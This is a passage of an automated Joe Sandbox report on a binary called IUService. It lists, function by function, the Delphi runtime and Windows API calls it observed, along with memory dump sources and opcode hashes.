                                                                                                                                            • API ID: System@$Sysutils@$System@@$AddressClr$qqrpvExcept$qqrvException@$bctr$qqrx20HashLoadModuleName$qqrpcName$qqruiProcRaiseRecxiStringString$qqrp20Stringpx14Unicode
                                                                                                                                            • String ID: Initialize
                                                                                                                                            • API String ID: 1682061199-2538663250
                                                                                                                                            • Opcode ID: ab808db70563f3f0fa6552d98e969f741daa7b01a3021ac412289ab684d2b595
                                                                                                                                            • Instruction ID: 46ff4c201679bb6a9b3a02cb542a9fa2f8a22491ac8c3f2d76804c6127a1f597
                                                                                                                                            • Opcode Fuzzy Hash: ab808db70563f3f0fa6552d98e969f741daa7b01a3021ac412289ab684d2b595
                                                                                                                                            • Instruction Fuzzy Hash: EC11C875A066995FD714EBE8FC5199EB7B8EF99300F80466AF814D3341DE74990086A0
                                                                                                                                            APIs
                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 5003101F
                                                                                                                                            • @Variants@VarResultCheck$qqrl.RTL120(?,?,?,?,500310B6,50030FEB), ref: 50031024
                                                                                                                                            • @System@@LStrClr$qqrpv.RTL120(?,?,?,500310B6,50030FEB), ref: 5003103A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Check$qqrlClearClr$qqrpvResultSystem@@VariantVariants@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 452420788-0
                                                                                                                                            • Opcode ID: eb70d2b8eab186a06ea140340b4e8703a8d7132057e564f3d20b5dcbcbd0fb7d
                                                                                                                                            • Instruction ID: 52db8ca31b00b2e44e7104484223e2f8e7d0f429c131b9206ee594ad239fc269
                                                                                                                                            • Opcode Fuzzy Hash: eb70d2b8eab186a06ea140340b4e8703a8d7132057e564f3d20b5dcbcbd0fb7d
                                                                                                                                            • Instruction Fuzzy Hash: 9D01D4117061D08E9B2EBB74E8955DE27DA9F5C200F685B73F004AB127CBF98CC583A2
                                                                                                                                            APIs
                                                                                                                                            • @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 5002C13F
                                                                                                                                            • @System@@WStrFromUStr$qqrr17System@WideStringx20System@UnicodeString.RTL120(?,?,00000000,5002C1B3,?,?,?,?,00000000,00000000,00000000), ref: 5002C165
                                                                                                                                            • @Strutils@MidStr$qqrx17System@WideStringxixi.RTL120(?,?,00000000,5002C1B3,?,?,?,?,00000000,00000000,00000000), ref: 5002C174
                                                                                                                                            • @System@@UStrFromWStr$qqrr20System@UnicodeStringx17System@WideString.RTL120(?,00000000,5002C1B3,?,?,?,?,00000000,00000000,00000000), ref: 5002C17F
                                                                                                                                            • @Sysutils@TStringBuilder@$bctr$qqrx20System@UnicodeStringi.RTL120(?,00000000,5002C1B3,?,?,?,?,00000000,00000000,00000000), ref: 5002C18B
                                                                                                                                            • @System@@WStrArrayClr$qqrpvi.RTL120(5002C1BA,?,?,?,00000000,00000000,00000000), ref: 5002C1A5
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$System@@$StringUnicodeWide$From$ArrayBuilder@$bctr$qqrx20ClassClassoClr$qqrpviCreate$qqrp17MetaStr$qqrr17Str$qqrr20Str$qqrx17StringiStringx17Stringx20StringxixiStrutils@Sysutils@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3564302108-0
                                                                                                                                            • Opcode ID: a080771f1c208bee87336802870a022ba774bc40fe05722359fd5bb0d4ea6352
                                                                                                                                            • Instruction ID: 58922c8f4528d5c8cfb5e260768a024238476e9fd86c34fd90099dd993f29032
                                                                                                                                            • Opcode Fuzzy Hash: a080771f1c208bee87336802870a022ba774bc40fe05722359fd5bb0d4ea6352
                                                                                                                                            • Instruction Fuzzy Hash: B1019231A01549ABDB15CB94EC92EDEB7B9DF89710FA08263F90497291DB30AE118690
                                                                                                                                            APIs
                                                                                                                                            • @Sysutils@StrNew$qqrpxc.RTL120 ref: 50028947
                                                                                                                                            • @Sysutils@StrLower$qqrpc.RTL120 ref: 5002894C
                                                                                                                                            • @Sysutils@StrNew$qqrpxc.RTL120(00000000,500289AE), ref: 50028964
                                                                                                                                              • Part of subcall function 5001DFD8: @Sysutils@StrLen$qqrpxc.RTL120(?,?,5002894C), ref: 5001DFE7
                                                                                                                                              • Part of subcall function 5001DFD8: @Sysutils@AnsiStrAlloc$qqrui.RTL120(?,?,5002894C), ref: 5001DFF1
                                                                                                                                              • Part of subcall function 5001DFD8: @Sysutils@StrMove$qqrpcpxcui.RTL120(?,?,5002894C), ref: 5001DFFA
                                                                                                                                            • @Sysutils@StrLower$qqrpc.RTL120(00000000,500289AE), ref: 50028969
                                                                                                                                            • @Sysutils@StrPos$qqrpxct1.RTL120(00000000,500289AE), ref: 50028977
                                                                                                                                            • @Sysutils@StrDispose$qqrpc.RTL120(500289B5), ref: 500289A0
                                                                                                                                            • @Sysutils@StrDispose$qqrpc.RTL120(500289B5), ref: 500289A8
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Sysutils@$Dispose$qqrpcLower$qqrpcNew$qqrpxc$Alloc$qqruiAnsiLen$qqrpxcMove$qqrpcpxcuiPos$qqrpxct1
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3159898584-0
                                                                                                                                            • Opcode ID: 65390a648ab706a9b4138e702ec1e558a2639dcf986a1068156ad4c86a6bf754
                                                                                                                                            • Instruction ID: 6b6a953f60cceed264f0bcce53d0f64a15a6626de01668e467ade48e568e826d
                                                                                                                                            • Opcode Fuzzy Hash: 65390a648ab706a9b4138e702ec1e558a2639dcf986a1068156ad4c86a6bf754
                                                                                                                                            • Instruction Fuzzy Hash: 58012C71A12A88AFCB01DFF8EC4159DBBF5EF49200F5186BAF414E3241D6345E82CB91
                                                                                                                                            APIs
                                                                                                                                            • @Sysutils@StrNew$qqrpxb.RTL120 ref: 500289D3
                                                                                                                                            • @Sysutils@StrLower$qqrpb.RTL120 ref: 500289D8
                                                                                                                                              • Part of subcall function 5001DF24: @Sysutils@StrLen$qqrpxb.RTL120(?,?,500289DD), ref: 5001DF2C
                                                                                                                                            • @Sysutils@StrNew$qqrpxb.RTL120(00000000,50028A3A), ref: 500289F0
                                                                                                                                              • Part of subcall function 5001E004: @Sysutils@StrLen$qqrpxb.RTL120(?,?,500289D8), ref: 5001E013
                                                                                                                                              • Part of subcall function 5001E004: @Sysutils@WideStrAlloc$qqrui.RTL120(?,?,500289D8), ref: 5001E01D
                                                                                                                                              • Part of subcall function 5001E004: @Sysutils@StrMove$qqrpbpxbui.RTL120(?,?,500289D8), ref: 5001E026
                                                                                                                                            • @Sysutils@StrLower$qqrpb.RTL120(00000000,50028A3A), ref: 500289F5
                                                                                                                                            • @Sysutils@StrPos$qqrpxbt1.RTL120(00000000,50028A3A), ref: 50028A03
                                                                                                                                            • @Sysutils@StrDispose$qqrpb.RTL120(50028A41), ref: 50028A2C
                                                                                                                                            • @Sysutils@StrDispose$qqrpb.RTL120(50028A41), ref: 50028A34
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Sysutils@$Dispose$qqrpbLen$qqrpxbLower$qqrpbNew$qqrpxb$Alloc$qqruiMove$qqrpbpxbuiPos$qqrpxbt1Wide
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2681763821-0
                                                                                                                                            • Opcode ID: dde631375cb4bb7d56f948556d53dd842de3bc36197af2cee0c4b0b25e22cf47
                                                                                                                                            • Instruction ID: 6bbc18074bfaf3f13c2d9ba9562f9445baf5c414cd24152d0a15d7c6618943bb
                                                                                                                                            • Opcode Fuzzy Hash: dde631375cb4bb7d56f948556d53dd842de3bc36197af2cee0c4b0b25e22cf47
                                                                                                                                            • Instruction Fuzzy Hash: 97012C71A02688AFDB01DFF8EC4168DB7F4EF18300F5186B6F514E3241DA749E818B95
                                                                                                                                            APIs
                                                                                                                                            • @System@@LStrClr$qqrpv.RTL120 ref: 5000565F
                                                                                                                                              • Part of subcall function 500087A8: @System@@FreeMem$qqrpv.RTL120(?,50004445,5000444D), ref: 500087C4
                                                                                                                                            • @System@@ReadString$qqrr15System@TTextRecp28System@%SmallString$iuc$255%i.RTL120 ref: 50005673
                                                                                                                                            • @System@@LStrFromString$qqrr27System@%AnsiStringT$us$i0$%rx28System@%SmallString$iuc$255%us.RTL120 ref: 5000567E
                                                                                                                                            • @System@@ReadString$qqrr15System@TTextRecp28System@%SmallString$iuc$255%i.RTL120 ref: 50005692
                                                                                                                                            • @System@@LStrFromString$qqrr27System@%AnsiStringT$us$i0$%rx28System@%SmallString$iuc$255%us.RTL120(00000000), ref: 5000569F
                                                                                                                                            • @System@@LStrCat$qqrv.RTL120(00000000), ref: 500056A9
                                                                                                                                              • Part of subcall function 50008C34: @System@@LStrSetLength$qqrv.RTL120(?,?,?,500056AE,00000000), ref: 50008C5B
                                                                                                                                              • Part of subcall function 50008C34: @System@@LStrAsg$qqrpvpxv.RTL120(00000000,?,?,?,500056AE,00000000), ref: 50008C72
                                                                                                                                              • Part of subcall function 50008C34: @System@Move$qqrpxvpvi.RTL120(00000000,?,?,?,500056AE,00000000), ref: 50008C81
                                                                                                                                              • Part of subcall function 50008C34: @System@@LStrClr$qqrpv.RTL120(00000000,?,?,?,500056AE,00000000), ref: 50008C8E
                                                                                                                                            • @System@@LStrClr$qqrpv.RTL120(00000000), ref: 500056B0
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@@$System@%$Small$Clr$qqrpvSystem@$AnsiFromReadRecp28StringString$iuc$255%iString$iuc$255%usString$qqrr15String$qqrr27T$us$i0$%rx28Text$Asg$qqrpvpxvCat$qqrvFreeLength$qqrvMem$qqrpvMove$qqrpxvpvi
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 662791780-0
                                                                                                                                            • Opcode ID: 322fabd3b3d09446b172a1f4d472e40869cc5ee6efa0138ea9fa57a789ac56db
                                                                                                                                            • Instruction ID: 1597da7cb89d32d484f3510e975d69330bfa973a8168dd2e4a5d6276ee6f1995
                                                                                                                                            • Opcode Fuzzy Hash: 322fabd3b3d09446b172a1f4d472e40869cc5ee6efa0138ea9fa57a789ac56db
                                                                                                                                            • Instruction Fuzzy Hash: 9AF09A61B0628007F30822AC686227EB6C65FE9621FE4433AB1A8C73C6CD658C8203C7
                                                                                                                                            APIs
                                                                                                                                            • GetCurrentDirectoryA.KERNEL32(00000105,?), ref: 50004321
                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?,00000105,?), ref: 50004327
                                                                                                                                            • GetCurrentDirectoryA.KERNEL32(00000105,?), ref: 50004336
                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?,00000105,?), ref: 50004347
                                                                                                                                            • @System@@LStrFromArray$qqrr27System@%AnsiStringT$us$i0$%pcius.RTL120(00000000,00000105,?), ref: 50004359
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CurrentDirectory$AnsiArray$qqrr27FromStringSystem@%System@@T$us$i0$%pcius
                                                                                                                                            • String ID: :
                                                                                                                                            • API String ID: 812956231-336475711
                                                                                                                                            APIs
                                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00000105,?), ref: 5000439E
                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,00000105,?), ref: 500043A4
                                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00000105,?), ref: 500043B3
                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,00000105,?), ref: 500043C4
                                                                                                                                            • @System@@WStrFromWArray$qqrr17System@WideStringpbi.RTL120(00000105,?), ref: 500043D4
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                             • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                             • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                             • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                             • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                             • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                             • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                             • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                             • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CurrentDirectory$Array$qqrr17FromStringpbiSystem@System@@Wide
                                                                                                                                            • String ID: :
                                                                                                                                            • API String ID: 3520144690-336475711
                                                                                                                                            APIs
                                                                                                                                            • @Variants@@DispInvoke$qp8TVarDatarx8TVarDatap16System@TCallDescpv.RTL120(?,?,?,?), ref: 500310E2
                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 50031100
                                                                                                                                            • @Variants@FindCustomVariantType$qqrxusrp27Variants@TCustomVariantType.RTL120(00000000,500311B4,?,?), ref: 50031166
                                                                                                                                            • @Variants@VarInvalidOp$qqrv.RTL120(00000000,500311B4,?,?), ref: 50031186
                                                                                                                                            • @Variants@@VarCopy$qqrr8TVarDatarx8TVarData.RTL120(500311BB,?), ref: 500311A6
                                                                                                                                            • @Variants@@VarClear$qqrr8TVarData.RTL120(500311BB,?), ref: 500311AE
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: VariantVariants@Variants@@$CustomDataDatarx8$CallClear$qqrr8Copy$qqrr8Datap16DescpvDispFindInitInvalidInvoke$qp8Op$qqrvSystem@TypeType$qqrxusrp27
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3013499437-0
                                                                                                                                            APIs
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50028208), ref: 5002814F
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50028208), ref: 50028179
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,00000000,50028208), ref: 500281B2
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,00000000,50028208), ref: 500281DF
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AnsiFromStr$qqrr20StringStringx27System@System@%System@@T$us$i0$%Unicode$Internal
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2707610650-0
                                                                                                                                            APIs
                                                                                                                                            • @Sysutils@WideFormatBuf$qqrpvuipxvuipx14System@TVarRecxirx24Sysutils@TFormatSettings.RTL120(?,?,?,?), ref: 5001F7D8
                                                                                                                                            • @System@@WStrFromPWCharLen$qqrr17System@WideStringpbi.RTL120(?,?,?,?), ref: 5001F7F3
                                                                                                                                            • @System@@WStrClr$qqrpv.RTL120 ref: 5001F812
                                                                                                                                              • Part of subcall function 50009588: SysFreeString.OLEAUT32(?), ref: 50009596
                                                                                                                                            • @System@@WStrSetLength$qqrr17System@WideStringi.RTL120 ref: 5001F81B
                                                                                                                                              • Part of subcall function 50009C30: @System@@NewWideString$qqri.RTL120(?,?,?,?,5000965D,?,?,?), ref: 50009C40
                                                                                                                                              • Part of subcall function 50009C30: @System@Move$qqrpxvpvi.RTL120(?,?,?,?,5000965D,?,?,?), ref: 50009C6E
                                                                                                                                            • @Sysutils@WideFormatBuf$qqrpvuipxvuipx14System@TVarRecxirx24Sysutils@TFormatSettings.RTL120(?,?,?,?), ref: 5001F845
                                                                                                                                            • @System@@WStrSetLength$qqrr17System@WideStringi.RTL120 ref: 5001F85A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@Wide$System@@$FormatSysutils@$Buf$qqrpvuipxvuipx14Length$qqrr17Recxirx24SettingsStringi$CharClr$qqrpvFreeFromLen$qqrr17Move$qqrpxvpviStringString$qqriStringpbi
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2345622591-0
                                                                                                                                            APIs
                                                                                                                                            • @Sysutils@WideFormatBuf$qqrpvuipxvuipx14System@TVarRecxi.RTL120(?,?,?), ref: 5001F6F0
                                                                                                                                            • @System@@WStrFromPWCharLen$qqrr17System@WideStringpbi.RTL120(?,?,?), ref: 5001F70B
                                                                                                                                            • @System@@WStrClr$qqrpv.RTL120 ref: 5001F72A
                                                                                                                                              • Part of subcall function 50009588: SysFreeString.OLEAUT32(?), ref: 50009596
                                                                                                                                            • @System@@WStrSetLength$qqrr17System@WideStringi.RTL120 ref: 5001F733
                                                                                                                                              • Part of subcall function 50009C30: @System@@NewWideString$qqri.RTL120(?,?,?,?,5000965D,?,?,?), ref: 50009C40
                                                                                                                                              • Part of subcall function 50009C30: @System@Move$qqrpxvpvi.RTL120(?,?,?,?,5000965D,?,?,?), ref: 50009C6E
                                                                                                                                            • @Sysutils@WideFormatBuf$qqrpvuipxvuipx14System@TVarRecxi.RTL120(?,?,?), ref: 5001F759
                                                                                                                                            • @System@@WStrSetLength$qqrr17System@WideStringi.RTL120 ref: 5001F76E
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@Wide$System@@$Buf$qqrpvuipxvuipx14FormatLength$qqrr17RecxiStringiSysutils@$CharClr$qqrpvFreeFromLen$qqrr17Move$qqrpxvpviStringString$qqriStringpbi
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4105650016-0
                                                                                                                                            APIs
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002782B,?,?,?,?,?,500156A4,00000000,500156E2), ref: 5002776B
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002782B,?,?,?,?,?,500156A4,00000000,500156E2), ref: 500277A2
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002782B,?,?,?,?,?,500156A4,00000000,500156E2), ref: 500277D2
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002782B,?,?,?,?,?,500156A4,00000000,500156E2), ref: 500277F8
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            APIs
                                                                                                                                            • @System@@LStrAddRef$qqrpv.RTL120(?,?,?,5000B069), ref: 5000B0D3
                                                                                                                                            • @System@@WStrAddRef$qqrr17System@WideString.RTL120(?,?,?,5000B069), ref: 5000B0E2
                                                                                                                                            • @System@@AddRefArray$qqrv.RTL120(?,?,?,?,5000B069), ref: 5000B10E
                                                                                                                                            • @System@@AddRefRecord$qqrv.RTL120(?,?,?,?,5000B069), ref: 5000B124
                                                                                                                                            • @System@@IntfAddRef$qqrx45System@%DelphiInterface$t17System@IInterface%.RTL120(?,?,?,5000B069), ref: 5000B134
                                                                                                                                            • @System@@DynArrayAddRef$qqrv.RTL120(?,?,?,5000B069), ref: 5000B143
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            APIs
                                                                                                                                            • @System@@LStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(00000000,?,?,?,?,50008CA1,?,?,?,500056AE,00000000), ref: 50009281
                                                                                                                                            • @System@@ReallocMem$qqrrpvi.RTL120(?,?,?,?,?,50008CA1,?,?,?,500056AE,00000000), ref: 5000929E
                                                                                                                                            • @System@@LStrClr$qqrpv.RTL120(00000000,?,?,?,?,50008CA1,?,?,?,500056AE,00000000), ref: 500092B7
                                                                                                                                            • @System@@NewAnsiString$qqrius.RTL120(?,?,?,?,50008CA1,?,?,?,500056AE,00000000), ref: 500092C8
